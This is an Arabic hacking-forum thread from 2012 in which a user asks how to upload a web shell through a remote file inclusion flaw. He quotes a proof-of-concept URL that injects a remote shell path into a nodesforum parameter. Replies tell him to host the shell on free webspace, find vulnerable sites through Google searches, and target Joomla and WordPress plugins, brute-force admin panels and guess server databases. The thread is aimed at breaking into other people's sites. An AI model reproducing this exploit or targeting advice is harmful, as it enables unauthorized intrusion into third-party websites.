التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. خدماتنـــــا .:: ] > جـــ'ابات العناكــ'ب

موضوع مغلق
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 05-26-2012, 08:57 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية Sn4Ke'z
 

 

 
إحصائية العضو






Sn4Ke'z غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Sn4Ke'z is on a distinguished road

افتراضي مجاب: طلب طريقة لرفع شل


السلأم عليكم .. ممكن موقع ارفع عليه شل
مثل استغلال هذه الثغرة .. يعني لازمك تربط رابط الشل بالملف المصاب
PoC: http://[target_host]/nodesforum/3rd_party_limits.php?_nodesforum_code_path=[RemoteShellCode]




Vspan style="font-weight: bold; color: #006400;"Cl[hf:VLspanC 'gf 'vdrm gvtu ag

   

أفضل جواب - كتبه MaFia
وعليكم السلام ورحمة الله وبركاته

ثغرات الريموت الان غير موجوده

الا بنسبة 1%
الثغره تعمل على اصدارات البي اتش بي 4 واقل

تقدر ترفع الشل على مساحه مجانيه

يوجدا ثغرات
local file

نفس انتشار ثغرات sql
يوجد ثغرات اخرى
xss
وثغرات
xss html
وثغرات
PHP Code Injection
وثغرات
Remote Command Execution

وثغرات
upload

استهدف عن طريق اضافات جملا واضافات الورد بريس
والبروت فورس على اللوحات

خمن على قواعد السيرفر
استعمل ادوات الباك تراك

كله مفيد فى الاستهداف
قديم 05-26-2012, 09:59 PM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
الصورة الرمزية mido868
 

 

 
إحصائية العضو






mido868 غير متواجد حالياً

إرسال رسالة عبر Yahoo إلى mido868

 

 

إحصائية الترشيح

عدد النقاط : 16
mido868 is on a distinguished road

افتراضي رد: طلب طريقة لرفع شل


اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة Sn4Ke'z
السلأم عليكم .. ممكن موقع ارفع عليه شل
مثل استغلال هذه الثغرة .. يعني لازمك تربط رابط الشل بالملف المصاب
PoC: http://[target_host]/nodesforum/3rd_party_limits.php?_nodesforum_code_path=[RemoteShellCode]

رفع الشيل له عدة طرق وسأحاول ان أجعل الامور بسيطة لكى تتضح الفكرة
النوع الذى ذكرته وهو نوع من انواع الثغرات تسمى الفايل انكلود وهى عبارة عن مواقع بها أخطاء او ملفات مصابة بخطأ برمجى يمكنك من خلال هذا الخطأ رفع الشيل ولكى تقوم بها أولا عليك ان تقوم برفع الشيل الخاص بك برابط مباشر ثم وضعه بعد رابط الموقع المصاب

كل ماعليك ان تبحث بعمو جوجل عن مواقع مصابة بهذه الثغرة وسوف تتمكن من رفع الشيل
التوقيع

علمتنى الحياة ألا اكون كالذين كتموا العلم فمات معهم
إذا عندك إقتراح وتريد تنفيذه (لو عندك اقتراح ،اكتبه هنا)
http://www.vbspiders.com/vb/t67563.html
AUHT

 

   

قديم 05-26-2012, 10:26 PM   رقم المشاركة : 3 (permalink)
معلومات العضو
 
الصورة الرمزية Sn4Ke'z
 

 

 
إحصائية العضو






Sn4Ke'z غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Sn4Ke'z is on a distinguished road

افتراضي


نعم أخي و هذا الذي أطلبه .. أطلب موقع يعطيني رابط مباشر للشل لكي استعمله في هذه الثغرات

أوكي ياغالي شكرا ع التوجيه الجيد ..
ممكن تنصحني بثغرة جيدة و منتشرة بكثرة غير الـ Sql

شكرا جزيلأ لك ع التوجيه
حاليا اعرف كيفية استغلال عدد قليل من الثغرات
و طبعا LFI و XSS لأ أفقه فيهم شي
لكن أحاول ان شاء الله


التعديل الأخير تم بواسطة mido868 ; 05-27-2012 الساعة 01:20 PM.

   

قديم 05-26-2012, 10:46 PM   رقم المشاركة : 4 (permalink)
معلومات العضو
MaFia
../Cody
 
الصورة الرمزية MaFia
 

 

 
إحصائية العضو








MaFia غير متواجد حالياً

إرسال رسالة عبر Yahoo إلى MaFia

 

 

إحصائية الترشيح

عدد النقاط : 16
MaFia is on a distinguished road

افتراضي


وعليكم السلام ورحمة الله وبركاته

ثغرات الريموت الان غير موجوده

الا بنسبة 1%
الثغره تعمل على اصدارات البي اتش بي 4 واقل

تقدر ترفع الشل على مساحه مجانيه

يوجدا ثغرات
local file

نفس انتشار ثغرات sql
يوجد ثغرات اخرى
xss
وثغرات
xss html
وثغرات
PHP Code Injection
وثغرات
Remote Command Execution

وثغرات
upload

استهدف عن طريق اضافات جملا واضافات الورد بريس
والبروت فورس على اللوحات

خمن على قواعد السيرفر
استعمل ادوات الباك تراك

كله مفيد فى الاستهداف

التوقيع

"إن للناس وجها شريرا وآخر طيبا والذكاء هو التعامل مع الجزء الطيب

من كل إنسان تقابله في حياتك

 


التعديل الأخير تم بواسطة mido868 ; 05-27-2012 الساعة 01:20 PM.

   

قديم 05-27-2012, 04:03 AM   رقم المشاركة : 5 (permalink)
معلومات العضو
vpn_31
Security
 
الصورة الرمزية vpn_31
 

 

 
إحصائية العضو








vpn_31 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
vpn_31 is on a distinguished road

افتراضي رد: طلب طريقة لرفع شل


ياغالي هذه ألثفرة منقرضه لا وجود لها يعني أحتمال تجد موقع واحد من أصل مليونين موقع...
وحتى لا تشتغل على Php5 تم ترقيع سحب ملف من خارج سيرفر لداخل السيرفر
أنصحك بتعلم ثغراة Bypass Upload , Xss , Sql

التوقيع

d0nt mess with me ;)

 

   

قديم 12-08-2014, 03:50 PM   رقم المشاركة : 6 (permalink)
معلومات العضو
 
الصورة الرمزية amin24566
 

 

 
إحصائية العضو







amin24566 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
amin24566 is on a distinguished road

افتراضي رد: طلب طريقة لرفع شل


thx

   

موضوع مغلق

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع


الساعة الآن 08:28 AM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0